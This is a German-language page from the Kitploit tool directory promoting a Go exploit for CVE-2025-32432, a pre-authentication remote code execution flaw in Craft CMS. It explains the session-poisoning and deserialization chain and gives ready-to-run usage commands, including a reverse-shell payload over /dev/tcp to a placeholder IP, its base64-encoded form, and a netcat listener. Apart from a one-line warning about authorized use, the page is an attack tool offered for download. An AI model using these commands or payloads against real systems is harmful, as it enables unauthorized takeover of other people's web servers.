Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32432 — Pre-auth RCE exploit for Craft CMS in Go. Grabs session/CSRF token, poisons PHP session, triggers deserialization for command execution or reverse shell. Pre-Auth-RCE-Exploit für Craft CMS in Go. Holt sich Session-/CSRF-Token, vergiftet die PHP-Session, löst Deserialisierung zur Befehlsausführung oder für eine Reverse Shell aus. | Kitploit
Tools/GitHubGitHub/heltonpojo/cve-2025-32432
Authentifizierung & AutorisierungPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubheltonpojo/cve-2025-32432

CVE-2025-32432

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
vor 20 TagenNoch nicht geprüft

Pre-auth RCE exploit for Craft CMS in Go. Grabs session/CSRF token, poisons PHP session, triggers deserialization for command execution or reverse shell. Pre-Auth-RCE-Exploit für Craft CMS in Go. Holt sich Session-/CSRF-Token, vergiftet die PHP-Session, löst Deserialisierung zur Befehlsausführung oder für eine Reverse Shell aus.

Teilen

CVE-2025-32432 — Craft CMS Pre-Auth RCE

Exploit für die Ausführung von Remote-Code ohne Authentifizierung im Craft CMS, geschrieben in Go.
Inspiriert von der ursprünglichen Arbeit von c0gnit00.

Funktionsweise

  1. Ruft die PHP-Session und das CSRF-Token über GET /admin/login ab
  2. Vergiftet die PHP-Session-Datei, indem PHP-Code in die Query-String injiziert wird
  3. Löst die Deserialisierung über assets/generate-transform aus, um die vergiftete Datei einzubinden und auszuführen

Verwendung

root@kitploit:~
go run main.go -u <url> -c <comando> 
FlagBeschreibungErforderlich
-uZiel-URL (z. B. http://target.com)Ja
-cAuszuführender Befehl (z. B. id, whoami)Ja

Beispiel

root@kitploit:~
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami

Reverse Shell

1. Generieren Sie den Payload in Base64 mit Ihrer IP und Ihrem Port:

root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64

2. Öffnen Sie den Listener:

root@kitploit:~
nc -lvnp 4444

3. Führen Sie den Exploit mit dem Payload aus:

root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"

Ersetzen Sie den Base64-Wert durch den in Schritt 1 mit Ihrer echten IP generierten Wert.

Warnung

Zur ausschließlichen Verwendung in autorisierten Umgebungen und kontrollierten Sicherheitstests.

Tool herunterladen